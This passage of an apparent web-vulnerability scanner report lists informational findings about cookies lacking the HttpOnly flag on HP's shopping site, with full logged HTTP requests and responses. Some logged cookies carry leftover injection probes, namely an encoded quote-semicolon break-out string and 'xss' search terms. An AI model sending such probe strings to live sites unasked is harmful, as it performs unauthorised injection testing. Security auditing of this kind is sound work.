GET /hc/9551721/?&site=9551721&cmd=mTagKnockPage&lpCallId=409443714656-583066007820&protV=20&lpjson=1&id=9607976011&javaSupport=true&visitorStatus=INSITE_STATUS&dbut=chat-bcs%7Cnull%7ClpChatDynamicChatButtonDiv%7C HTTP/1.1
Host: sales.liveperson.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://www.backcountry.com/store/cart/add.html?item_code=BCS0021&mv_order_group=1&mv_todo=refresh&mv_form_profile=option_check&mv_session_id=&mv_order_cat_id=&mv_order_subcat_id=&mv_order_pg_id=&mv_order_catalog_id=&mv_order_is_gift_box=0&is_package=0&is_giftcert=1&mv_javascript=1&mv_sku=BCS0021-BCSGC125-ONSI&sku_options=1&mv_order_swatch_position=&mv_order_quantity=1&x=55&y=10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LivePersonID=LP i=5110247826455,d=1314795678

Response

HTTP/1.1 200 OK
Date: Thu, 22 Sep 2011 12:11:58 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Content-Type: application/x-javascript
Accept-Ranges: bytes
Last-Modified: Thu, 22 Sep 2011 12:11:59 GMT
Set-Cookie: HumanClickSiteContainerID_9551721=STANDALONE; path=/hc/9551721
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 31272

lpConnLib.Process({"ResultSet": {"lpCallId":"409443714656-583066007820","lpCallConfirm":"","lpJS_Execute":[{"code_id": "webServerOverride", "js_code": "if (lpMTagConfig.lpServer != 'sales.liveperson.n
...[SNIP]...

4.59. http://www.shopping.hp.com/design  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.shopping.hp.com
Path:   /design

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /design?jumpid=in_R329_prodexp/hhoslp/psg/lateralnav_accessories HTTP/1.1
Host: www.shopping.hp.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.shopping.hp.com/go/touchpadfaqs;HHOJSID=HWSJT6HFQjsTjvLKGJywb6ddpcRLmz2xPdythnKG2FZ6ZGygbLyp!133787182?jumpid=in_R329_prodexp/hhoslp/psg/lateralnav_tablet_home
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731D29105161EB6-600001A4C0302EDC[CE]; OV_VISTA_2009_04_09=0; hpcomsh_usen=s1=xss%20printer&s1_context=hpcomsearch&s2=xss+printer&s2_context=hhostore&s3=xss&s3_context=hpcomsearch; mbox=session#1316670895509-389686#1316672894|check#true#1316671094; s_pn=gw:us:en-us:home; s_re=ams; lang=en-us; cc=us; OAX=Mhd7ak56iIkAATNs; s_var_20=in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fmasthead%2Ffreeshipping; jumpstack=%5B%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_services_home'%2C'1316670961899'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_printers_home'%2C'1316670966980'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_supplies_home'%2C'1316670973931'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home4923e%2527%253B1cd62d1ca9e'%2C'1316671059055'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Fdesktops%2Fpromo_tile%2F1%2Fdt_promo_tile1_budget_friendly_921'%2C'1316671280650'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fmasthead%2Ffreeshipping'%2C'1316671282219'%5D%5D; ijumpstack=%5B%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_services_home'%2C'1316670961900'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_printers_home'%2C'1316670966980'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_supplies_home'%2C'1316670973931'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home4923e%2527%253B1cd62d1ca9e'%2C'1316671059055'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Fdesktops%2Fpromo_tile%2F1%2Fdt_promo_tile1_budget_friendly_921'%2C'1316671280652'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fmasthead%2Ffreeshipping'%2C'1316671282221'%5D%5D; hpshopping=1&user_id=mlksgt%2BT3Ap7MSrqvlvccAyb0ic%3D&home_slot_1=BV704AA%23ABA%7CLP011AV%23ABA&home_slot_1_type=0%7CCTO&home_slot_1_category=0%7Cdesktops%2Fp7xt_series&home_slot_1_Affix=0%7CGS&cart_id=1603777571; _rmc_n=2; HHOJSID=LRgpT6MFm4zJCr4b99PqVpYCwCngnLth4hy6S0fnYbY2fBYN5tNm!133787182; prop12=r602; EMID=; s_depth=21; hp_cust_seg_sel=HHO; gpv_pN=hho%3Ags%3Ampr%3Aportal%3Amain; s_cc=true; hpcompc_usen=cartExists=true; HP_EBUS=true; HP_EBUS_HP_CLICKS=4x19x11121; s_sq=hphqglobal%2Chphqna%2Chphqhhorollup%2Chphqnahpshopping%3D%2526pid%253Dhho%25253Ags%25253Alanding%25253Astatic%25253Atouchpadfaqs%2526pidt%253D1%2526oid%253D%25252Fdesign_jumpid%25253Din_R329_prodexp%25252Fhhoslp%25252Fpsg%25252Flateralnav_accessories_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1

Response

HTTP/1.1 200 OK
Date: Thu, 22 Sep 2011 01:17:37 GMT
Server: Apache/2.0.59 HP-UX_Apache-based_Web_Server (Unix) DAV/2 mod_ssl/2.0.59 OpenSSL/0.9.8k
Cache-Control: private
Set-Cookie: hpcompc_usen=cartExists=true; domain=.hp.com; expires=Friday, 20-Jan-2012 01:17:38 GMT; path=/
X-Powered-By: Servlet/2.4 JSP/2.0
Vary: Accept-Encoding
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 148298

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">


<html lang="en">
<head>
<!-- hps_he
...[SNIP]...

4.60. http://www.shopping.hp.com/desktops  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.shopping.hp.com
Path:   /desktops

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /desktops;HHOJSID=HWSJT6HFQjsTjvLKGJywb6ddpcRLmz2xPdythnKG2FZ6ZGygbLyp!133787182?jumpid=in_R329_prodexp/hhoslp/psg/lateralnav_desktops_home HTTP/1.1
Host: www.shopping.hp.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.shopping.hp.com/webapp/shopping/home.do
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hpcomsh_usen=s1=xss&s1_context=hpcomsearch; s_vi=[CS]v1|2731D29105161EB6-600001A4C0302EDC[CE]; mbox=check#true#1316670956|session#1316670895509-389686#1316672756; s_pn=gw:us:en-us:home; s_re=ams; HHOJSID=HWSJT6HFQjsTjvLKGJywb6ddpcRLmz2xPdythnKG2FZ6ZGygbLyp!133787182; hpshopping=1&user_id=mlkpjNmR0Qt%2BNyntuVfacgSd0ic%3D; hpcompc_usen=cartExists=false; lang=en-us; cc=us; OV_VISTA_2009_04_09=0; EMID=; s_depth=2; hp_cust_seg_sel=HHO; gpv_pN=hho%3Ags%3Ahome; s_cc=true; s_sq=%5B%5BB%5D%5D; HP_EBUS_HP_CLICKS=1x1x1

Response

HTTP/1.1 200 OK
Date: Thu, 22 Sep 2011 00:54:39 GMT
Server: Apache/2.0.59 HP-UX_Apache-based_Web_Server (Unix) DAV/2 mod_ssl/2.0.59 OpenSSL/0.9.8k
Cache-Control: private
Set-Cookie: hpshopping=1&user_id=mlkrg9ye0A55NS%2FpuVTbcgSelmvi; expires=Friday, 20-Jan-2012 00:54:40 GMT; path=/
Set-Cookie: hpcompc_usen=cartExists=false; domain=.hp.com; expires=Friday, 20-Jan-2012 00:54:40 GMT; path=/
X-Powered-By: Servlet/2.4 JSP/2.0
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 208060


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html lang="en">
<head>
   <!--
...[SNIP]...

4.61. http://www.shopping.hp.com/esp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.shopping.hp.com
Path:   /esp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /esp;HHOJSID=HWSJT6HFQjsTjvLKGJywb6ddpcRLmz2xPdythnKG2FZ6ZGygbLyp!133787182?jumpid=in_R329_prodexp/hhoslp/psg/lateralnav_services_home HTTP/1.1
Host: www.shopping.hp.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.shopping.hp.com/webapp/shopping/home.do
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hpcomsh_usen=s1=xss&s1_context=hpcomsearch; s_vi=[CS]v1|2731D29105161EB6-600001A4C0302EDC[CE]; mbox=check#true#1316670956|session#1316670895509-389686#1316672756; s_pn=gw:us:en-us:home; s_re=ams; HHOJSID=HWSJT6HFQjsTjvLKGJywb6ddpcRLmz2xPdythnKG2FZ6ZGygbLyp!133787182; lang=en-us; cc=us; OV_VISTA_2009_04_09=0; EMID=; s_depth=3; s_var_20=in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home; hp_cust_seg_sel=HHO; gpv_pN=hho%3Ags%3Alanding%3Acs%3Adesktops; jumpstack=%5B%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home'%2C'1316670949238'%5D%5D; ijumpstack=%5B%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home'%2C'1316670949239'%5D%5D; s_cc=true; s_sq=%5B%5BB%5D%5D; hpshopping=1&user_id=mlkpiNuW0Ql6Oijjs1beeACYlmvi; hpcompc_usen=cartExists=false; HP_EBUS_HP_CLICKS=2x2x8

Response

HTTP/1.1 200 OK
Date: Thu, 22 Sep 2011 00:54:47 GMT
Server: Apache/2.0.59 HP-UX_Apache-based_Web_Server (Unix) DAV/2 mod_ssl/2.0.59 OpenSSL/0.9.8k
Cache-Control: private
Set-Cookie: hpshopping=1&user_id=mlkpgt2U3wN6NSvrvlHYdgad0ic%3D; expires=Friday, 20-Jan-2012 00:54:48 GMT; path=/
Set-Cookie: hpcompc_usen=cartExists=false; domain=.hp.com; expires=Friday, 20-Jan-2012 00:54:48 GMT; path=/
X-Powered-By: Servlet/2.4 JSP/2.0
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 167900


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html lang="en">
<head>
   <!--
...[SNIP]...

4.62. http://www.shopping.hp.com/go/microsoftoffers  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.shopping.hp.com
Path:   /go/microsoftoffers

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /go/microsoftoffers?jumpid=in_R329_prodexp/hhoslp/psg/desktops/promo_tile/3/dt_promo_tile3_buy_a_pc_and_get_an_xbox_526 HTTP/1.1
Host: www.shopping.hp.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.shopping.hp.com/desktops;HHOJSID=HWSJT6HFQjsTjvLKGJywb6ddpcRLmz2xPdythnKG2FZ6ZGygbLyp!133787182?jumpid=in_R329_prodexp/hhoslp/psg/lateralnav_desktops_home
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731D29105161EB6-600001A4C0302EDC[CE]; OV_VISTA_2009_04_09=0; hpcomsh_usen=s1=xss%20printer&s1_context=hpcomsearch&s2=xss+printer&s2_context=hhostore&s3=xss&s3_context=hpcomsearch; mbox=session#1316670895509-389686#1316672894|check#true#1316671094; s_pn=gw:us:en-us:home; s_re=ams; lang=en-us; cc=us; OAX=Mhd7ak56iIkAATNs; hpshopping=1&user_id=mlksgt%2BT3Ap7MSrqvlvccAyb0ic%3D&home_slot_1=BV704AA%23ABA%7CLP011AV%23ABA&home_slot_1_type=0%7CCTO&home_slot_1_category=0%7Cdesktops%2Fp7xt_series&home_slot_1_Affix=0%7CGS&cart_id=1603777571; _rmc_n=2; HHOJSID=LRgpT6MFm4zJCr4b99PqVpYCwCngnLth4hy6S0fnYbY2fBYN5tNm!133787182; prop12=r602; HP_EBUS=true; hpcompc_usen=cartExists=true; EMID=; s_depth=23; s_var_20=in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fesp%2Flaptops_and_mini_pcs; hp_cust_seg_sel=HHO; gpv_pN=hho%3Ags%3Alanding%3Anotebook%3Alaptops%20and%20mini%20pcs; jumpstack=%5B%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_supplies_home'%2C'1316670973931'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home4923e%2527%253B1cd62d1ca9e'%2C'1316671059055'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Fdesktops%2Fpromo_tile%2F1%2Fdt_promo_tile1_budget_friendly_921'%2C'1316671280650'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fmasthead%2Ffreeshipping'%2C'1316671282219'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_accessories'%2C'1316672330058'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fesp%2Flaptops_and_mini_pcs'%2C'1316672333031'%5D%5D; ijumpstack=%5B%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_supplies_home'%2C'1316670973931'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home4923e%2527%253B1cd62d1ca9e'%2C'1316671059055'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Fdesktops%2Fpromo_tile%2F1%2Fdt_promo_tile1_budget_friendly_921'%2C'1316671280652'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fmasthead%2Ffreeshipping'%2C'1316671282221'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_accessories'%2C'1316672330059'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fesp%2Flaptops_and_mini_pcs'%2C'1316672333032'%5D%5D; s_cc=true; HP_EBUS_HP_CLICKS=4x19x11159; s_sq=hphqglobal%2Chphqna%2Chphqhhorollup%2Chphqnahpshopping%3D%2526pid%253Dhho%25253Ags%25253Alanding%25253Acs%25253Adesktops%2526pidt%253D1%2526oid%253D%25252Fgo%25252Fmicrosoftoffers_jumpid%25253Din_R329_prodexp%25252Fhhoslp%25252Fpsg%25252Fdesktops%25252Fpromo_tile%25252F3%25252Fdt_promo_tile3_buy_a__1%2526oidt%253D1%2526ot%253DA%2526oi%253D1

Response

HTTP/1.1 200 OK
Date: Thu, 22 Sep 2011 01:17:48 GMT
Server: Apache/2.0.59 HP-UX_Apache-based_Web_Server (Unix) DAV/2 mod_ssl/2.0.59 OpenSSL/0.9.8k
Cache-Control: private
Set-Cookie: hpcompc_usen=cartExists=true; domain=.hp.com; expires=Friday, 20-Jan-2012 01:17:49 GMT; path=/
X-Powered-By: Servlet/2.4 JSP/2.0
Vary: Accept-Encoding
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 137842

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">


<html lang="en">
<head>
<!-- hps_he
...[SNIP]...

4.63. http://www.shopping.hp.com/go/touchpadfaqs  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.shopping.hp.com
Path:   /go/touchpadfaqs

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /go/touchpadfaqs;HHOJSID=HWSJT6HFQjsTjvLKGJywb6ddpcRLmz2xPdythnKG2FZ6ZGygbLyp!133787182?jumpid=in_R329_prodexp/hhoslp/psg/lateralnav_tablet_home HTTP/1.1
Host: www.shopping.hp.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.shopping.hp.com/webapp/shopping/home.do
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hpcomsh_usen=s1=xss&s1_context=hpcomsearch; s_vi=[CS]v1|2731D29105161EB6-600001A4C0302EDC[CE]; mbox=check#true#1316670956|session#1316670895509-389686#1316672756; s_pn=gw:us:en-us:home; s_re=ams; HHOJSID=HWSJT6HFQjsTjvLKGJywb6ddpcRLmz2xPdythnKG2FZ6ZGygbLyp!133787182; lang=en-us; cc=us; OV_VISTA_2009_04_09=0; EMID=; s_depth=2; hp_cust_seg_sel=HHO; gpv_pN=hho%3Ags%3Ahome; s_cc=true; s_sq=%5B%5BB%5D%5D; hpshopping=1&user_id=mlktjNuS3QxxMC3vvlfcdgKY0ic%3D; hpcompc_usen=cartExists=false; HP_EBUS_HP_CLICKS=1x1x4

Response

HTTP/1.1 200 OK
Date: Thu, 22 Sep 2011 00:54:45 GMT
Server: Apache/2.0.59 HP-UX_Apache-based_Web_Server (Unix) DAV/2 mod_ssl/2.0.59 OpenSSL/0.9.8k
Cache-Control: private
Set-Cookie: hpshopping=1&user_id=mlkti9uU0Ql8NyDuvVDYcwSc0ic%3D; expires=Friday, 20-Jan-2012 00:54:46 GMT; path=/
Set-Cookie: hpcompc_usen=cartExists=false; domain=.hp.com; expires=Friday, 20-Jan-2012 00:54:46 GMT; path=/
X-Powered-By: Servlet/2.4 JSP/2.0
Vary: Accept-Encoding
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 129613

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">


<html lang="en">
<head>
<!-- hps_he
...[SNIP]...

4.64. http://www.shopping.hp.com/printer  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.shopping.hp.com
Path:   /printer

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /printer;HHOJSID=HWSJT6HFQjsTjvLKGJywb6ddpcRLmz2xPdythnKG2FZ6ZGygbLyp!133787182?jumpid=in_R329_prodexp/hhoslp/ipg/lateralnav_printers_home HTTP/1.1
Host: www.shopping.hp.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.shopping.hp.com/webapp/shopping/home.do
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hpcomsh_usen=s1=xss&s1_context=hpcomsearch; s_vi=[CS]v1|2731D29105161EB6-600001A4C0302EDC[CE]; mbox=check#true#1316670956|session#1316670895509-389686#1316672756; s_pn=gw:us:en-us:home; s_re=ams; HHOJSID=HWSJT6HFQjsTjvLKGJywb6ddpcRLmz2xPdythnKG2FZ6ZGygbLyp!133787182; lang=en-us; cc=us; OV_VISTA_2009_04_09=0; hpshopping=1&user_id=mlksj9iT3wN6My%2FvuVvfeAGd0ic%3D; hpcompc_usen=cartExists=false; EMID=; s_depth=4; s_var_20=in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_tablet_home; hp_cust_seg_sel=HHO; gpv_pN=hho%3Ags%3Alanding%3Astatic%3Atouchpadfaqs; jumpstack=%5B%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home'%2C'1316670949238'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_tablet_home'%2C'1316670953100'%5D%5D; ijumpstack=%5B%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home'%2C'1316670949239'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_tablet_home'%2C'1316670953101'%5D%5D; s_cc=true; s_sq=%5B%5BB%5D%5D; HP_EBUS_HP_CLICKS=3x3x12

Response

HTTP/1.1 200 OK
Date: Thu, 22 Sep 2011 00:54:50 GMT
Server: Apache/2.0.59 HP-UX_Apache-based_Web_Server (Unix) DAV/2 mod_ssl/2.0.59 OpenSSL/0.9.8k
Cache-Control: private
Set-Cookie: hpshopping=1&user_id=mlkjiNGW3A97NCDouVXddgea0ic%3D; expires=Friday, 20-Jan-2012 00:54:49 GMT; path=/
Set-Cookie: hpcompc_usen=cartExists=false; domain=.hp.com; expires=Friday, 20-Jan-2012 00:54:49 GMT; path=/
X-Powered-By: Servlet/2.4 JSP/2.0
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 199437


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html lang="en">
<head>
   <!--
...[SNIP]...

4.65. http://www.shopping.hp.com/scat/desktops/p7xt_series/rts/3/computer_store  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.shopping.hp.com
Path:   /scat/desktops/p7xt_series/rts/3/computer_store

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

POST /scat/desktops/p7xt_series/rts/3/computer_store HTTP/1.1
Host: www.shopping.hp.com
Proxy-Connection: keep-alive
Content-Length: 0
Cache-Control: max-age=0
Origin: http://www.shopping.hp.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.shopping.hp.com/webapp/shopping/store_access.do?template_type=series_detail&category=desktops&series_name=p7xt_series&jumpid=in_R329_prodexp/hhoslp/psg/desktops/promo_tile/1/dt_promo_tile1_Budget_Friendly_921
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2731D29105161EB6-600001A4C0302EDC[CE]; HHOJSID=HWSJT6HFQjsTjvLKGJywb6ddpcRLmz2xPdythnKG2FZ6ZGygbLyp!133787182; OV_VISTA_2009_04_09=0; hpcomsh_usen=s1=xss%20printer&s1_context=hpcomsearch&s2=xss+printer&s2_context=hhostore&s3=xss&s3_context=hpcomsearch; mbox=session#1316670895509-389686#1316672894|check#true#1316671094; s_pn=gw:us:en-us:home; s_re=ams; lang=en-us; cc=us; _rmc_n=1; OAX=Mhd7ak56iIkAATNs; hpshopping=1&user_id=mlkjit%2BQ3Ql7NSzqs1TccwGd0ic%3D&home_slot_1=LP011AV%23ABA&home_slot_1_type=CTO&home_slot_1_category=desktops%2Fp7xt_series&home_slot_1_Affix=GS; hpcompc_usen=cartExists=false; s_var_20=in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fmasthead%2Ffreeshipping; hp_cust_seg_sel=HHO; gpv_pN=hho%3Ags%3Apopup%3Afree%20shipping; jumpstack=%5B%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_services_home'%2C'1316670961899'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_printers_home'%2C'1316670966980'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_supplies_home'%2C'1316670973931'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home4923e%2527%253B1cd62d1ca9e'%2C'1316671059055'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Fdesktops%2Fpromo_tile%2F1%2Fdt_promo_tile1_budget_friendly_921'%2C'1316671280650'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fmasthead%2Ffreeshipping'%2C'1316671282219'%5D%5D; ijumpstack=%5B%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_services_home'%2C'1316670961900'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_printers_home'%2C'1316670966980'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fipg%2Flateralnav_supplies_home'%2C'1316670973931'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Flateralnav_desktops_home4923e%2527%253B1cd62d1ca9e'%2C'1316671059055'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg%2Fdesktops%2Fpromo_tile%2F1%2Fdt_promo_tile1_budget_friendly_921'%2C'1316671280652'%5D%2C%5B'in_r329_prodexp%2Fhhoslp%2Fpsg_ipg%2Fmasthead%2Ffreeshipping'%2C'1316671282221'%5D%5D; prop12=r602; EMID=; s_depth=17; s_cc=true; HP_EBUS_HP_CLICKS=4x15x6213; s_sq=hphqglobal%2Chphqna%2Chphqhhorollup%2Chphqnahpshopping%3D%2526pid%253Dhho%25253Ags%25253Asdp%25253Adesktops%25253Aeveryday%252520computing%25253Ap7xt_series%2526pidt%253D1%2526oid%253Dfunctiononclick(event)%25257BstoConfig.submit()%25253B%25257D%2526oidt%253D2%2526ot%253DSUBMIT

Response

HTTP/1.1 200 OK
Date: Thu, 22 Sep 2011 01:10:46 GMT
Server: Apache/2.0.59 HP-UX_Apache-based_Web_Server (Unix) DAV/2 mod_ssl/2.0.59 OpenSSL/0.9.8k
Cache-Control: private
Set-Cookie: HHOJSID=LpBWT6LW1LTjGTZRyfm0fbKTmkGKngPQLj0bRtv4yPG1nnDMyvwk!-1039217636; expires=Friday, 23-Sep-2011 01:10:47 GMT; path=/
Set-Cookie: hpcompc_usen=cartExists=true; domain=.hp.com; expires=Friday, 20-Jan-2012 01:10:47 GMT; path=/
X-Powered-By: Servlet/2.4 JSP/2.0
Vary: Accept-Encoding
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 230201

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">


<html lang="en">
<head>
<!-- hps
...[SNIP]...

4.66. http://www.shopping.hp.com/scat/desktops/p7xt_series/rts/3/computer_store  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.shopping.hp.com
Path:   /scat/desktops/p7xt_series/rts/3/computer_store

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

POST /scat/desktops/p7xt_series/rts/3/computer_store HTTP/1.1
Host: www.shopping.hp.com
Proxy-Connection: keep-alive
Content-Length: 0
Cache-Control: max-age=0
Origin: http://www.shopping.hp.com
